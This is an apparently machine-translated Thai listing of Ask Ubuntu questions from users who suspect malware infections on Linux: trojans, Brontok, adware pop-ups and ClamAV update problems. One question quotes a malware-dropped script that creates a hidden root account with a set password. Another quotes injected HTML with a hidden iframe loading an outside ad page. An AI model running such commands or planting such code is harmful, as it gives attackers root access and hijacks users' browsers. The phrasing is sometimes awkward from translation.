คำถามติดแท็ก malware

เมื่อเร็ว ๆ นี้ฉันได้พบกับสิ่งนี้: Linux Trojan ไม่มีการเปิดเผยเป็นเวลาเกือบหนึ่งปี (Unreal IRCd) ใช่ฉันรู้ว่าการเพิ่ม PPA / ซอฟต์แวร์แบบสุ่มจากแหล่งที่ไม่น่าเชื่อถือกำลังขอให้มีปัญหา (หรือแย่กว่านั้น) ฉันไม่เคยทำเช่นนั้น แต่หลายคนทำ (บล็อก Linux และแท็บลอยด์จำนวนมากส่งเสริมการเพิ่ม PPA สำหรับแอปแฟนซีโดยไม่มีการเตือนว่ามันอาจทำให้ระบบของคุณแย่ลงหรือแย่ลงกว่าเดิม ม้าโทรจันหรือแอปพลิเคชัน / สคริปต์สามารถตรวจพบและลบออกได้อย่างไร

16 security  malware 

หัวข้อเดียวกัน (หรือคล้ายกัน) ได้รับการครอบคลุมใน Ask Ubuntu เมื่อไม่นานมานี้: Ubuntu 17.04 Chromium Browser เงียบ ๆ ให้การเข้าถึงบัญชี Google อย่างเต็มที่ ฉันเพิ่งติดตั้ง Ubuntu 16.04 ใหม่ทั้งหมด ด้วยความประหลาดใจของฉัน "แอป Ubuntu" ยังคงปรากฏขึ้นและสามารถเข้าถึงบัญชี Google ของฉันได้อย่างสมบูรณ์ ฉันไม่เข้าใจว่าทำไมมันค่อนข้างน่าผิดหวัง นี่คืออะไร? ฉันไม่ได้รับอนุญาต "Ubuntu" อาจเป็นรหัสที่เป็นอันตรายหรือไม่ อาจเป็นอันตรายหรือไม่รหัสที่เป็นอันตรายนี้มาจากส่วนขยาย Chromium ที่ฉันติดตั้งซึ่งติดตั้งตัวเองใหม่เมื่อฉันเริ่มต้นและลงชื่อเข้าใช้ด้วย Chromium เป็นครั้งแรก ฉันได้ติดตั้ง Chromium โดยใช้เทอร์มินัล: sudo apt-get install chromium-browser สกรีนช็อต: บัญชี Google -> แอพของบุคคลที่สาม -> Ubuntu นอกจากนี้ …

16 google-chrome  chromium  malware 

ก่อนที่คุณจะแนะนำฉันเกี่ยวกับตัวเลือกในการบันทึกไฟล์ของฉันและการฟอร์แมตไดรฟ์โดยใช้gpartedโปรดเข้าใจว่าฉันสามารถทำได้หลายชั่วโมงและอาจใช้เวลาเพียงไม่กี่นาที ที่จริงแล้วฉันต้องการเข้าใจสิ่งที่เกิดขึ้นจริงที่นี่ สถานการณ์กำลังทำลายประสบการณ์ทั้งหมดของฉันที่ได้รับในช่วงหลายปีที่ผ่านมา ฉันรู้สึกว่าถ้าฉันใส่แฟลชไดรฟ์ที่ติดเชื้อไวรัสลงในเครื่อง Ubuntu ของฉันสิ่งที่ฉันต้องทำก็คือเพียงแค่ลบไฟล์ไวรัสและฉันก็พร้อมที่จะไป วันนี้ฉันรวบรวมไฟล์บางไฟล์ในแฟลชไดรฟ์ที่ฟอร์แมต NTFS จากเครื่อง Windows อย่างสมบูรณ์โดยรู้ว่าเครื่องติดไวรัส เมื่อฉันเสียบแฟลชไดรฟ์เข้ากับเครื่องฉันพบว่ามันเก็บไฟล์และโฟลเดอร์ไว้มากมาย ฉันได้ลบพวกเขาส่วนใหญ่ หนึ่งเดียวที่แสดงความต้านทานอย่างหนักคือไดเรกทอรี RECYCLER (และไดเรกทอรีย่อย) คุณสมบัติของไดเรกทอรีนี้ drwx------ 1 masroor masroor 4.0K May 7 16:01 RECYCLER/ ถ้าฉันรันrmคำสั่ง sudo rm -rvf RECYCLER/ ฉันได้ผลลัพธ์ที่ยาวนานในสายของ rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/OagFrAIX.exe': Input/output error rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/viJbcvrJ.cpl': Input/output error <rest snipped> สิ่งที่น่าสนใจไฟล์ที่รายงานข้างต้นแสดงโดยlsคำสั่งพร้อมชุดคุณลักษณะจำนวนมาก ls -l RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/ …

15 windows  usb-drive  ntfs  malware  ntfs-3g 

ฉันพยายามที่จะปรับปรุงฐานข้อมูล ClamAV freshclamโดยการเรียกใช้ daily-*.cdiffถูกดาวน์โหลดประสบความสำเร็จ แต่แล้วแฮงค์ CPU ได้สูงสุดที่ 100% แต่การอัพเดตจะไม่เสร็จสิ้น ฉันยกเลิกกระบวนการด้วยCtrl+ Cหลังจาก appr 10 นาที. นี่คือผลลัพธ์จากความพยายามอัปเดตของฉัน: # freshclam ClamAV update process started at Tue Nov 8 00:15:57 2016 main.cvd is up to date (version: 57, sigs: 4218790, f-level: 60, builder: amishhammer) Downloading daily-22474.cdiff [100%] มีใครสังเกตพฤติกรรมนี้บ้างไหม เป็นข้อบกพร่องหรือระบบของฉันไม่ได้รับการตั้งค่าอย่างเหมาะสมหรือไม่ PS: ฉันกำลังใช้งานClamAV v0.99.2บน Ubuntu Mate …

15 16.04  updates  malware  antivirus  clamav 

ฉันเพิ่งเรียกดูไซต์เมื่อไม่นานมานี้ที่ถูกตั้งค่าสถานะเป็น "ไซต์โจมตี" หรือมีมัลแวร์ แต่ Firefox ไม่ได้เตือนก่อนที่ฉันจะเข้าไป เฉพาะเมื่อฉันเปิดแท็บใหม่ที่มีเพจอื่นจากไซต์ทำการบล็อกหน้านั้น ฉันจะตรวจสอบช่องโหว่ในระบบของฉันได้อย่างไรเนื่องจากฉันคิดว่าไม่มีโปรแกรมป้องกันมัลแวร์สำหรับ Ubuntu หากมีโปรดบอก ขอบคุณ!

14 security  malware 

เมื่อเร็ว ๆ นี้ฉันสังเกตเห็นเซิร์ฟเวอร์ภายในบ้านของฉันทำงานช้าลงอย่างเจ็บปวด ทรัพยากรทั้งหมดที่ถูกกินโดยกระบวนการที่สอง: และcrond64 tsmแม้ว่าฉันจะฆ่าพวกเขาซ้ำ ๆ พวกเขาก็ยังคงปรากฏตัวต่อไปเรื่อย ๆ ในขณะเดียวกัน ISP ของฉันก็แจ้งให้ฉันทราบเกี่ยวกับการละเมิดที่มาจากที่อยู่ IP ของฉัน: ==================== Excerpt from log for 178.22.105.xxx==================== Note: Local timezone is +0100 (CET) Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx …

14 malware  antivirus 

ดังนั้นฉันจึงพยายามที่จะติดตั้งบางสิ่งบางอย่างในไวน์เมื่อฉันพบข้อเสนอแนะเพื่อใช้ sudo เพื่อรับสิทธิ์ผู้ดูแลระบบ นั่นคือเมื่อฉันได้รับข้อความข้างต้น ~/.wine is not owned by you อ่านฉันรู้อย่างรวดเร็วว่าทำไมข้อความนี้ปรากฏขึ้นและพยายามที่จะsudoไวน์ที่ไม่ดีจริงๆ IDEA ดังนั้นฉันไม่ได้ทำอะไรเพิ่มเติมและไม่ได้ตั้งใจจะsudoดื่มไวน์อีกเลย คำถามของฉันคือเพราะฉันได้รับบล็อกนี้ฉันปลอดภัยหรือไม่ หรือฉันจำเป็นต้องลบไวน์ทั้งหมดเพราะฉันทำหรือไม่

12 wine  sudo  security  malware 

ฉันค่อนข้างแน่ใจว่าแล็ปท็อป Ubuntu 13.10 ของฉันติดมัลแวร์บางประเภท ทุกครั้งที่ฉันพบกระบวนการ / lib / sshd (เป็นเจ้าของโดย root) ทำงานและใช้ cpu มากมาย ไม่ใช่เซิร์ฟเวอร์ sshd ที่รัน / usr / sbin / sshd ไบนารีมีสิทธิ์ --wxrw-rwt และสร้างและวางไข่สคริปต์ในไดเรกทอรี / lib ชื่อล่าสุดคือ 13959730401387633604 และทำสิ่งต่อไปนี้ #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd ผู้ใช้ gusr ถูกสร้างขึ้นโดยมัลแวร์อย่างอิสระจากนั้น …

12 security  malware 

ฉันลงชื่อเข้าใช้ Gmail แล้วฉันมีอีเมลจาก Amazon เกี่ยวกับการจัดอันดับตามลำดับล่าสุด ฉันไม่รู้จัก บริษัท แต่ตัดสินใจเปิดอีเมลจากนั้นทันทีที่เห็นว่าไม่ได้มาจากอเมซอนและดูเหมือนว่ามันเป็นอีเมลที่ "แย่" พร้อมสิ่งที่สุ่มจำนวนมากและมีคนพยายามเอาเปรียบบางอย่าง ฉันอายุ 16.04 ฉันมักจะอ่าน Ubuntu ค่อนข้างปลอดภัยเพราะทุกสิ่งที่ต้องการรูท มีซอฟต์แวร์ใดบ้างที่ฉันควรใช้เพื่อให้แน่ใจว่าไม่มีอะไรในระบบของฉันตอนนี้หรือสิ่งที่ฉันควรทำเพื่อให้แน่ใจว่าฉันปลอดภัยหรือไม่ ฉันมักจะระมัดระวังเกี่ยวกับอีเมล แต่อันนี้ให้ฉัน

10 security  malware 

ปิด คำถามนี้จะต้องมีมากขึ้นมุ่งเน้น ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้มุ่งเน้นที่ปัญหาเดียวโดยแก้ไขโพสต์นี้ ปิดให้บริการใน3 ปีที่ผ่านมา รูปแบบไฟล์ใดที่ใช้สร้างไวรัสใน Ubuntu ตัวอย่างเช่นไวรัส Windows ส่วนใหญ่เขียนใน.exeรูปแบบ แต่ฉันไม่สามารถระบุรูปแบบปกติใน Ubuntu ได้

9 malware 

แก้ไข: สิ่งนี้แตกต่างจากสำเนาที่แนะนำ สิ่งที่ซ้ำกันที่แนะนำนั้นเกี่ยวกับไวรัสและโปรแกรมป้องกันไวรัสโดยทั่วไป คำถามนี้มีเฉพาะเกี่ยวกับการเข้ารหัส ransomwareวิธีที่มันสามารถเรียกใช้และไม่ว่ามันจะมีผลต่อโฟลเดอร์ที่เข้ารหัส ทุกวันนี้ซอฟต์แวร์ที่เป็นอันตรายดูเหมือนว่าจะติดคอมพิวเตอร์ Windows เข้ารหัสข้อมูลตามความประสงค์ของพวกเขาและขอค่าไถ่ Bitcoin เพื่อแลกกับกุญแจเข้ารหัส ฉันคิดว่าอาจเป็นไปได้ยากที่ทุกคนจะใช้รหัส ransomware สำหรับ Linux แต่สมมุติว่ามีคนทำ: เพื่อให้ซอฟต์แวร์สามารถเรียกใช้ "สำเร็จ" บนเครื่อง Ubuntu ผู้ใช้จะต้องเรียกใช้และให้รหัสผ่าน sudo ก่อนหรือไม่ เป็นภัยคุกคามที่เป็นไปได้บน Ubuntu โดยผู้ใช้ไม่ทำเช่นนี้? หากไฟล์ผู้ใช้ถูกเข้ารหัสไปแล้วจะป้องกันได้หรือไม่ โปรแกรม ransomware สามารถติดตั้งโดยผู้ใช้โดยไม่เจตนา (ผู้ที่ยืนยันด้วยรหัสผ่าน sudo) สามารถใช้ตัวประกันข้อมูลที่เข้ารหัสไว้ล่วงหน้าได้หรือไม่ โดยทั่วไปแล้วความอ่อนแอของ Ubuntu ในการเข้ารหัส ransomware มีความเสี่ยงเพียงใดและการกระทำของผู้ใช้ที่ไม่ประมาท / ไม่ได้ผลนั้นต้องมีอะไรบ้างเพื่อให้ข้อมูลของเขาหรือเธอถูกจับเป็นตัวประกัน

9 malware 

ช่องโฆษณาป๊อปอัพจะปรากฏขึ้นทุกเว็บไซต์ที่ฉันเปิด พยายามรีเซ็ตการตั้งค่าปิดการใช้งานส่วนขยายนำผู้ใช้ทั้งหมดบน Chrome ออก ดูเหมือนว่ามันไม่เกี่ยวกับโครเมี่ยมเนื่องจากมีสิ่งเดียวกันเกิดขึ้นกับ Firefox ด้วยซึ่งฉันไม่เคยเปิดมาก่อน ฉันสงสัยว่าอาจมีบางอย่างเกี่ยวข้องกับที่เก็บข้อมูลบางส่วนที่ฉันเพิ่มเมื่อเร็ว ๆ นี้แม้ว่าจะต้องทำอย่างไร ให้ฉันอธิบายป๊อปอัปเนื่องจากฉันไม่สามารถอัปโหลดภาพได้เนื่องจากฉันมีชื่อเสียงไม่เพียงพอ มันวางอยู่ตรงกลางของหน้าและไม่ใหญ่มาก ไม่ย้ายไปกับส่วนที่เหลือของหน้าอยู่ในขณะที่เลื่อนหน้า ข้างในบางครั้งก็มีโฆษณา google AdBlock บล็อกเนื้อหา แต่ไม่ใช่ป๊อปอัปเอง ผลการตรวจสอบองค์ประกอบ: <div id="thisisonesplashforclicktocloseidhere" style= "position:fixed;z-index:999900;top:50%;left:50%;margin-top:-125px;margin-left:-150px;width:300px;height:250px;background-color:#fff;border:4px solid #444;-moz-box-shadow:0 0 12px 4px #888;-webkit-box-shadow:0 0 12px 4px #888;box-shadow:0 0 12px 4px #888;-webkit-border-radius:4px;border-radius:4px;"> <iframe frameborder="0" height="0" scrolling="no" src= "http://guzelyemek.com/reklam.html?gads_300x250" style= "display: none !important; visibility: hidden !important; …

9 14.04  malware  rootkit  popup-ads 

เมื่อฉันเริ่มต้นกับ Linux และในขณะที่ศึกษาโครงสร้างไฟล์และสิทธิ์การเข้าถึงของระบบ Linux ความคิดที่คิดในใจของฉันว่าตราบใดที่คุณทำงานเฉพาะในบัญชีที่มีการ จำกัด หรือ จำกัด น้อยไม่มีไวรัสหรือมัลแวร์ที่เคยเข้ามา บัญชีของคุณจะส่งผลกระทบต่อทั้งระบบ "มัน" จะไม่ส่งผลกระทบต่อแอปพลิเคชันต่าง ๆ ที่ติดตั้งเนื่องจากการตั้งค่าและเอกสารที่บันทึกไว้ทั้งหมดถูกเก็บไว้ในบัญชีของคุณเท่านั้น ... หรือฉันเข้าใจผิดเกี่ยวกับเรื่องนี้หรือไม่? เกี่ยวกับเรื่องนี้ฉันมีความกังวลกับคำสั่ง "sudo" ใน Ubuntu หากฉันเคยใช้ sudo กับบัญชีส่วนตัวโดยใช้เทอร์มินัลจากภายในบัญชีผู้ใช้หรือแขกที่ติดเชื้อโดยไม่ได้รับอนุญาต แต่มีมัลแวร์จากโฟลเดอร์หลักของผู้ใช้ที่ติดเชื้อจะยังคงซึมเข้าไปในระบบทั้งหมด นอกจากนี้ด้วย Windows Emulator, Wine ... ฉันสังเกตเห็นว่าแอปพลิเคชันที่ฉันติดตั้งนั้นไม่ได้ใช้กับระบบ แต่มีการแปลเป็นภาษาท้องถิ่นในบัญชีที่ฉันใช้เมื่อฉันติดตั้ง น่าเสียดายที่แอปพลิเคชั่นไวน์เป็นแม่เหล็กมัลแวร์ ภายในหนึ่งสัปดาห์ ClamTK ตรวจพบภัยคุกคามมากกว่า 700 รายการ ฉันควรกังวลเกี่ยวกับภัยคุกคามที่เกิดขึ้นและแพร่กระจายไปทั่วทั้งระบบหรือไม่? ขอบคุณล่วงหน้าสำหรับคนที่สามารถทำให้กระจ่างเกี่ยวกับเรื่องนี้

8 permissions  login  security  malware 

แล็ปท็อปของฉันทำงานบน Ubuntu และเพิ่งติดไวรัส brontokที่ติดเชื้อ Ubuntu ผ่านแฟลชไดรฟ์เพราะติดตั้ง Wine อยู่ ฉันใช้ USB ในคอมพิวเตอร์ Windows ที่ติดเชื้อซึ่งเป็นของคนที่ฉันรู้จัก มันสร้าง.exeไฟล์ในโฟลเดอร์แอปพลิเคชันแบบสุ่ม ฉันพบ.exeไฟล์ในโฟลเดอร์สำหรับโปรแกรมแก้ไขวิดีโอ Openshot, Audacity, Wine บางครั้งมันสร้าง.exeไฟล์ในโฟลเดอร์ Desktop ของฉันมันสร้างรูปภาพ Brontok แบบคลาสสิกที่มีพื้นหลังสีเขียวในโฟลเดอร์รูปภาพเป็นไฟล์ HTML และถ้าฉันลบสิ่งเหล่านี้ พวกเขาจะปรากฏขึ้นอีกครั้งทุกครั้งที่เปิดเครื่องคอมพิวเตอร์ ฉันไม่สามารถตั้งชื่อโฟลเดอร์ทั้งหมดที่เวิร์มนี้กำลังสร้าง.exeไฟล์อยู่พวกมันจบแล้วและการลบก็ไม่ได้ช่วยอะไร คู่มือที่ครอบคลุมเกี่ยวกับวิธีการลบมันชื่นชม

3 command-line  wine  malware  removing